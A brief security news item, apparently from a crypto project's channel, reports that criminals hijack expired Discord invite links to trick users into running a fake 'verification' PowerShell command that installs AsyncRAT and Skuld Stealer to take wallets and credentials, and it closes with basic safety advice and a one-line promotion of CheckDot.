Cybercriminals are hijacking expired Discord invite links to spread malware that steals crypto wallets and personal data. Victims are tricked into joining fake servers where they're asked to run a “verification” PowerShell command. This command launches a multi-stage malware attack using Pastebin and GitHub to bypass detection.

The malware includes tools like AsyncRAT and Skuld Stealer, allowing hackers to access devices, steal credentials, and extract wallet seed phrases. The attack has already affected users worldwide, especially in the U.S. and Europe.

Users are advised to avoid suspicious invite links, never run unknown scripts, and use strong endpoint protection.

CheckDot is SAFU research on CheckDot 🤝